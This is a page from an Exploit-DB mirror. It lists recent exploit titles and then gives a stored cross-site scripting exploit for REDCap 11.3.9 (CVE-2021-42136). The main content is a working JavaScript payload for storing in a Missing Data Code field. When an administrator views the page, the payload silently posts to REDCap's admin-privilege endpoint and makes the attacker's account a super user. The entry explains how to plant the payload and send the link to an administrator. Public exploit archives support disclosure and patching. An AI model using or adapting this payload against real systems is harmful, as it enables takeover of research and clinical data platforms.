bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/php/webapps/50877.txt
Offensive Security 093714dc70 DB: 2022-04-20 
21 changes to exploits/shellcodes

Microsoft Exchange Mailbox Assistants 15.0.847.40 - 'Service MSExchangeMailboxAssistants' Unquoted Service Path
Microsoft Exchange Active Directory Topology 15.0.847.40 - 'Service MSExchangeADTopology' Unquoted Service Path
7-zip - Code Execution / Local Privilege Escalation
PTPublisher v2.3.4 - Unquoted Service Path
EaseUS Data Recovery - 'ensserver.exe' Unquoted Service Path
Zyxel NWA-1100-NH - Command Injection
ManageEngine ADSelfService Plus 6.1 - User Enumeration
Verizon 4G LTE Network Extender - Weak Credentials Algorithm
Delta Controls enteliTOUCH 3.40.3935 - Cross-Site Request Forgery (CSRF)
Delta Controls enteliTOUCH 3.40.3935 - Cross-Site Scripting (XSS)
Delta Controls enteliTOUCH 3.40.3935 - Cookie User Password Disclosure

Scriptcase 9.7 - Remote Code Execution (RCE)
WordPress Plugin Motopress Hotel Booking Lite 4.2.4 - SQL Injection
Easy Appointments 1.4.2 - Information Disclosure
WordPress Plugin Videos sync PDF 1.7.4 - Stored Cross Site Scripting (XSS)
WordPress Plugin Popup Maker 1.16.5 - Stored Cross-Site Scripting (Authenticated)
REDCap 11.3.9 - Stored Cross Site Scripting
PKP Open Journals System 3.3 - Cross-Site Scripting (XSS)
WordPress Plugin Elementor 3.6.2 - Remote Code Execution (RCE) (Authenticated)
Fuel CMS 1.5.0 - Cross-Site Request Forgery (CSRF)
2022-04-20 05:01:45 +00:00

44 lines
No EOL
2 KiB
Text
Raw Permalink Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

# Exploit Title: REDCap 11.3.9 - Stored Cross-Site Scripting
# Date: 2021-10-11
# Exploit Author: Kendrick Lam
# References: https://github.com/KCL04/XSS-PoCs/blob/main/CVE-2021-42136.js
# Vendor Homepage: https://projectredcap.org
# Software Link: https://projectredcap.org
# Version: Redcap before 11.4.0
# Tested on: 11.2.5
# CVE: CVE-2021-42136
# Security advisory: https://redcap.med.usc.edu/_shib/assets/ChangeLog_Standard.pdf
### Stored XSS Missing Data Code Value (found by Kendrick Lam)
It was possible to store JavaScript as values for Missing Data Codes.
- Where: Missing Data Code.
- Payload:
<script>
var target = document.location.host;
var csrf_token = csrf_token;
var userId = '<userId>'; // Replace with your user ID.
function privesc()
{
var xhr = new XMLHttpRequest();
xhr.open("POST", "https://" + target + "/index.php?route=ControlCenterController:saveNewAdminPriv", true);
xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
xhr.setRequestHeader("Sec-Fetch-Dest", "empty");
xhr.withCredentials = "true";
var body = "";
body += "userid=" + userId + "&attrs=admin_rights%2Csuper_user%2Caccount_manager%2Caccess_system_config%2Caccess_system_upgrade%2Caccess_external_module_install%2Caccess_admin_dashboards&csrf_token=" + csrf_token;
xhr.send(body);
return true;
}
privesc();
</script>
- Details: The payload will escalate a regular user's privileges, if viewed by an account with permission to change privileges (such as an administrator).
- Privileges: Low privileged / regular user
- Location example: https://redcap.XXX/redcap/redcap_vv11.2.5/Design/data_dictionary_codebook.php?pid=XX
- Privileges:
+ Store: Low privileged user is able to store Missing Data Code values.
+ Execute: Any authenticated user. The payload will trigger once the page loads, this means storing the payload and sending over the link to an administrator would be able to escalate the user's privileges. For example, by browsing to https://redcap.XXX/redcap/redcap_vv11.2.5/Design/data_dictionary_codebook.php?pid=XX
Reference in a new issue View git blame Copy permalink